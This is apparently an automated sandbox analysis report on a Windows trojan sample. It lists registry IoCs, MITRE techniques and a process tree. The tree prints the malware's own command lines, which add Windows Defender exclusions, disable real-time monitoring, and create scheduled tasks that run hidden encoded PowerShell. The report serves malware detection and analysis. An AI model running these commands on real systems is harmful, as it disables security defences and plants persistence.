6415ed206a26c4e6788eb0e945073eb073a005defea0e1b08c1a206d8bd64ca4

Analysis

max time kernel
143s
max time network
151s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
03/12/2022, 23:03

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.2MB
MD5

bd65afbdc58836bf4a21827b42ddfad2
SHA1

d3267af4cfb887f6896fbfe7b99a05542308e8ca
SHA256

6415ed206a26c4e6788eb0e945073eb073a005defea0e1b08c1a206d8bd64ca4
SHA512

3e62ca107a580bb0f6097f51d4435aca51b9c62687f856d495ba7d1aa69dc514a202f860498bb4dac7f9541e54e7d59d47dfe543df7a393c61741f6ca75b8cc1
SSDEEP

196608:91OScJmUdkdjI3TcvugJdsRhaTgwFSDy/ZcW+HqmgkgVH3xliR:3OJs4MU3wRJaDaTJFafHqBPx+

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe

Windows security bypass 2 TTPs 36 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zKmGvtjvGeRU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\OgWVLfnPHYbAiFhVE = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\xPNGPhvDjHPGAmao = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\fYOTwRFYDbVGsmVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SNIvMuqlU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ooeyfDzKaJtISlwbWlR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PpPFzTMhaqUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\xPNGPhvDjHPGAmao = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\xPNGPhvDjHPGAmao = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ooeyfDzKaJtISlwbWlR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SNIvMuqlU = "0"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PpPFzTMhaqUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zKmGvtjvGeRU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\OgWVLfnPHYbAiFhVE = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\xPNGPhvDjHPGAmao = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GfKPUYaJjhrXC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GfKPUYaJjhrXC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\fYOTwRFYDbVGsmVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Executes dropped EXE 3 IoCs

pid	Process
1160	Install.exe
2028	Install.exe
1132	vzNeyfe.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Loads dropped DLL 8 IoCs

pid	Process
1128	file.exe
1160	Install.exe
1160	Install.exe
1160	Install.exe
1160	Install.exe
2028	Install.exe
2028	Install.exe
2028	Install.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	vzNeyfe.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	vzNeyfe.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	vzNeyfe.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bhBDilUAvyaioGKiEH.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
860	schtasks.exe
788	schtasks.exe
1072	schtasks.exe
892	schtasks.exe
560	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2024	powershell.EXE
2024	powershell.EXE
2024	powershell.EXE
1300	powershell.EXE
1300	powershell.EXE
1300	powershell.EXE
1372	powershell.EXE
1372	powershell.EXE
1372	powershell.EXE
1416	powershell.EXE
1416	powershell.EXE
1416	powershell.EXE

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2024	powershell.EXE
Token: SeDebugPrivilege	1300	powershell.EXE
Token: SeDebugPrivilege	1372	powershell.EXE
Token: SeDebugPrivilege	1416	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1128 wrote to memory of 1160	1128	file.exe	27
PID 1128 wrote to memory of 1160	1128	file.exe	27
PID 1128 wrote to memory of 1160	1128	file.exe	27
PID 1128 wrote to memory of 1160	1128	file.exe	27
PID 1128 wrote to memory of 1160	1128	file.exe	27
PID 1128 wrote to memory of 1160	1128	file.exe	27
PID 1128 wrote to memory of 1160	1128	file.exe	27
PID 1160 wrote to memory of 2028	1160	Install.exe	28
PID 1160 wrote to memory of 2028	1160	Install.exe	28
PID 1160 wrote to memory of 2028	1160	Install.exe	28
PID 1160 wrote to memory of 2028	1160	Install.exe	28
PID 1160 wrote to memory of 2028	1160	Install.exe	28
PID 1160 wrote to memory of 2028	1160	Install.exe	28
PID 1160 wrote to memory of 2028	1160	Install.exe	28
PID 2028 wrote to memory of 1212	2028	Install.exe	30
PID 2028 wrote to memory of 1212	2028	Install.exe	30
PID 2028 wrote to memory of 1212	2028	Install.exe	30
PID 2028 wrote to memory of 1212	2028	Install.exe	30
PID 2028 wrote to memory of 1212	2028	Install.exe	30
PID 2028 wrote to memory of 1212	2028	Install.exe	30
PID 2028 wrote to memory of 1212	2028	Install.exe	30
PID 2028 wrote to memory of 568	2028	Install.exe	32
PID 2028 wrote to memory of 568	2028	Install.exe	32
PID 2028 wrote to memory of 568	2028	Install.exe	32
PID 2028 wrote to memory of 568	2028	Install.exe	32
PID 2028 wrote to memory of 568	2028	Install.exe	32
PID 2028 wrote to memory of 568	2028	Install.exe	32
PID 2028 wrote to memory of 568	2028	Install.exe	32
PID 1212 wrote to memory of 360	1212	forfiles.exe	33
PID 1212 wrote to memory of 360	1212	forfiles.exe	33
PID 1212 wrote to memory of 360	1212	forfiles.exe	33
PID 1212 wrote to memory of 360	1212	forfiles.exe	33
PID 1212 wrote to memory of 360	1212	forfiles.exe	33
PID 1212 wrote to memory of 360	1212	forfiles.exe	33
PID 1212 wrote to memory of 360	1212	forfiles.exe	33
PID 568 wrote to memory of 1416	568	forfiles.exe	36
PID 568 wrote to memory of 1416	568	forfiles.exe	36
PID 568 wrote to memory of 1416	568	forfiles.exe	36
PID 568 wrote to memory of 1416	568	forfiles.exe	36
PID 568 wrote to memory of 1416	568	forfiles.exe	36
PID 568 wrote to memory of 1416	568	forfiles.exe	36
PID 568 wrote to memory of 1416	568	forfiles.exe	36
PID 360 wrote to memory of 1048	360	cmd.exe	35
PID 360 wrote to memory of 1048	360	cmd.exe	35
PID 360 wrote to memory of 1048	360	cmd.exe	35
PID 360 wrote to memory of 1048	360	cmd.exe	35
PID 360 wrote to memory of 1048	360	cmd.exe	35
PID 360 wrote to memory of 1048	360	cmd.exe	35
PID 360 wrote to memory of 1048	360	cmd.exe	35
PID 1416 wrote to memory of 948	1416	cmd.exe	37
PID 1416 wrote to memory of 948	1416	cmd.exe	37
PID 1416 wrote to memory of 948	1416	cmd.exe	37
PID 1416 wrote to memory of 948	1416	cmd.exe	37
PID 1416 wrote to memory of 948	1416	cmd.exe	37
PID 1416 wrote to memory of 948	1416	cmd.exe	37
PID 1416 wrote to memory of 948	1416	cmd.exe	37
PID 360 wrote to memory of 1132	360	cmd.exe	38
PID 360 wrote to memory of 1132	360	cmd.exe	38
PID 360 wrote to memory of 1132	360	cmd.exe	38
PID 360 wrote to memory of 1132	360	cmd.exe	38
PID 360 wrote to memory of 1132	360	cmd.exe	38
PID 360 wrote to memory of 1132	360	cmd.exe	38
PID 360 wrote to memory of 1132	360	cmd.exe	38
PID 1416 wrote to memory of 1612	1416	cmd.exe	39

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1128
- C:\Users\Admin\AppData\Local\Temp\7zS1E99.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1160
- - C:\Users\Admin\AppData\Local\Temp\7zS2425.tmp\Install.exe
    .\Install.exe /S /site_id "525403"
    3⤵
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Drops file in System32 directory
    - Enumerates system info in registry
    - Suspicious use of WriteProcessMemory
    PID:2028
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1212
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:360
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        6⤵
        
        PID:1048
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        6⤵
        
        PID:1132
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:568
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1416
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        6⤵
        
        PID:948
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        6⤵
        
        PID:1612
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "gdJoryUdv" /SC once /ST 21:07:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      Creates scheduled task(s)
      PID:860
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "gdJoryUdv"
      4⤵
      PID:992
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "gdJoryUdv"
      4⤵
      PID:1288
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bhBDilUAvyaioGKiEH" /SC once /ST 23:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\OgWVLfnPHYbAiFhVE\NAkXkIrJYkqfitP\vzNeyfe.exe\" vx /site_id 525403 /S" /V1 /F
      4⤵
      Drops file in Windows directory
      Creates scheduled task(s)
      PID:788

C:\Windows\system32\taskeng.exe
taskeng.exe {26ED0350-D432-48E0-B0A7-EC81B75B3D8A} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
1⤵
PID:1084
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2024
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1300
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1224
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1372
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1672
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1416
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1672

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1936

C:\Windows\system32\taskeng.exe
taskeng.exe {ADC6FBE1-1871-456D-8F30-9E42DAED2C7E} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1812
- C:\Users\Admin\AppData\Local\Temp\OgWVLfnPHYbAiFhVE\NAkXkIrJYkqfitP\vzNeyfe.exe
  C:\Users\Admin\AppData\Local\Temp\OgWVLfnPHYbAiFhVE\NAkXkIrJYkqfitP\vzNeyfe.exe vx /site_id 525403 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:1132
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gfQkyzGCy" /SC once /ST 19:35:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1072
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gfQkyzGCy"
    3⤵
    PID:568
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gfQkyzGCy"
    3⤵
    PID:972
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:112
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1408
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:2036
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2008
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ganJiVZhk" /SC once /ST 15:41:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:892
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "ganJiVZhk"
    3⤵
    PID:1432
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "ganJiVZhk"
    3⤵
    PID:624
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xPNGPhvDjHPGAmao" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1504
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xPNGPhvDjHPGAmao" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:616
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xPNGPhvDjHPGAmao" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:472
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xPNGPhvDjHPGAmao" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1360
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xPNGPhvDjHPGAmao" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:432
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xPNGPhvDjHPGAmao" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1972
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xPNGPhvDjHPGAmao" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1388
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xPNGPhvDjHPGAmao" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1788
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\xPNGPhvDjHPGAmao\iokuEgyt\drqjXBpRIEUdqQGm.wsf"
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\xPNGPhvDjHPGAmao\iokuEgyt\drqjXBpRIEUdqQGm.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:1960
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GfKPUYaJjhrXC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2032
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GfKPUYaJjhrXC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:788
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PpPFzTMhaqUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1816
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PpPFzTMhaqUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1692
  - - C:\Windows\SysWOW64\reg.exe
